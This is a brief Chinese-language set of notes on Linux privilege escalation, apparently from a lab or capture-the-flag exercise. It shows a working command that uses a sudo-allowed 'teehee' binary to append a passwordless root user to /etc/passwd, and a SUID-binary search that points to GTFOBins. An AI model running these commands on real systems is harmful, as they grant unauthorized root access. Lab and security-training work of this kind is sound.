linux 提权

1.sudo提权

通过命令sudo -l查看是否有可提权的命令。

teehee 

teehee --help

发现-a参数 可以追加

那麽我们选择给/etc/passwd 追加我们自己定义的用户名

echo 'admin::0:0::/home/admin:/bin/bash' |sudo teehee -a /etc/passwd

用户名admin 密码无

2.suid提权

通过命令find / -perm -4000 2>/dev/null查看是否具有root权限的命令

可以登录网站https://gtfobins.github.io/

搜索可以提权的命令然后进行提权

3.系统版本内核提权。

4.通过数据库提权。